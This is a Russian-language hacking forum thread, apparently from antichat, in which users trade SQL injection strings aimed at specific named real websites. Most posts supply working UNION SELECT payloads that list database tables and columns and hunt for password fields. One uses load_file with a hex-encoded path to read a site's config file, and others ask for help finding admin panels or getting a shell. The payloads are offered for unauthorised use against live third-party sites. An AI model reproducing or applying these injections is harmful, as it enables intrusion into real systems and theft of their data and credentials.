Вот: http://www.nll.com/admin.inc. Но там 403. З.Ы. Видел уже не один твой подобный пост. Скачай себе сканер директорий сайта и им же ищи админку.
Decoy хм... пробуй такой запрос site.com/fail.php?id=-1+union+select +GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME)+SEPARATOR+0x3C62723E)+from+information_schema.columns+where+column_name+like+0x257061737325+or+column_name+like+0x25702577256425--+ Далее из полученных таблиц выводи имена колонок: site.com/fail.php?id=-1+union+select +GROUP_CONCAT(column_name)+SEPARATOR+0x3C62723E)+from+information_schema.columns+where+table_name=захексенное.имя.таблицы--+ получаешь имена колонок, и: site.com/fail.php?id=-1+union+select +concat_ws(0x3a,имена необходимых колонок)+from+iимя.таблицы--+ (если не будет вывода через точку имя_базы.имя_таблицы) ЗЫ: +(пробел) перед коментариями не нужен) =) всего)
Добрый день! С помощью этого сайта можно загрузить config.php, но он не показывает все файлы содержат. Есть ли у нас какой-либо способ для просмотра полного файл или заполнить оболочку? http://www.siremax.com.mx/remaxnatura/propiedad-detalle.php?tipo=casas&id=9844 and 1=0 UNION SELECT 1,2,load_file(0x2F7661722F7777772F68746D6C2F72656D61782F72656D61786D756C74697573752F7070686C6F676765722F636F6E6669672E696E632E706870),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113--
исходный код показать предела информации, посмотрите как некоторые функции вырезать. мы можем читать (load_file) построчно? ". '('.mysql_errno().') '.mysql_error().' '. "Please check your settings in config.inc.php ! "); mysql_select_db(PPHL_DB_NAME) or die("Please first create your database '".PPHL_DB_NAME."' and make sure your user got the correct access rights on it !"); ; define('__GOT_MYSQL__', 1); } ?>
Пожалуйста, помогите мне, как добраться таблиц и столбцов с этого сайта. Я не могу использовать синтаксис union_ http://www.canal.qc.ca/recherche.php?type=domaine&domaine=2%27
0_о не понял в чем проблема? http://www.canal.qc.ca/recherche.php?type=domaine&domaine=2%27+union+select+1,2,3,4,5,concat_ws%280x3a,table_schema,table_name,column_name%29+from+information_schema.columns--+
Привет. Есть сайтик. На шаред хостинге стоит, в другой стране. Работает под управлением самописного движка (сорцев нет). На сайтике есть один скриптик. Его вызов таков: http://site/lol.php?p=name этот скрипт инклюдит файл /pages/name.php (".php" подставляется автоматом). Еще знаю путь к PHP (мне так кажется, выглядит как /usr/local/nf/php5/lib/php). Еще кое что есть. Скриптик, который как-то хитро выполняет запрос. Ему подставляешь число, а он делает выборку из базы (SQL) и выдает ссылку на файл. Если подставить ему, например, -1 в качестве номера, начинает срать кирпичами. Ничего особого там нет, если не считать полного раскрытия путей. Что можно сделать, дорогие эксперты? Спасибо.
По той информации, что ты предоставил, судить о наличии уязвимостей не возможно. Либо задавай вопрос конкретнее, либо читай статьи.
Помогите плиз сформировать строку иньекции, а то с выводом даже ошибки, а что-то ничего не прокатывает ( http://www.noracom24.eu/image.php?w=200&h=120&id='
Code: http://www.noracom24.eu/image.php?w=200&h=120&id=1+and+1=2+union+select+group_concat%28table_name%29+from+information_schema.tables+where+table_schema=database%28%29+--+ там в картинке выводится
Seravin Сенкс, даже не подумал что так может быть...мда тут по ходу никак не поработаешь автоматизировано с ней, с таким выводом (
не знаю как вы но я никогда не использовал программы чтобы найти или автоматически раскрутить скул, от этого одни минусы 1. вы не осваиваете sql инъекцию хорошо 2. вы доверяете программу которая может ошибиться 3. и этот взлом даже не можете считать вашим (это чистое мнение) однажды я раскрутил скул до паролей, походу было два запроса и поэтому немного потрудилась над колонками.. потом скул даль программу havij которая считается крутой тулзой,и программа не смог раскрутить скул sql инъекции бывают такими разными что программно раскрутить все это не реально(я так думаю) вообщем дело ваше, простите за оффтоп(если это оффтоп)
https://forum.antichat.ru/showpost.php?p=2243635&postcount=14262 Актуально. Konqi, иногда надоедают однотипные действия) Хотя самостоятельно лучше, да.
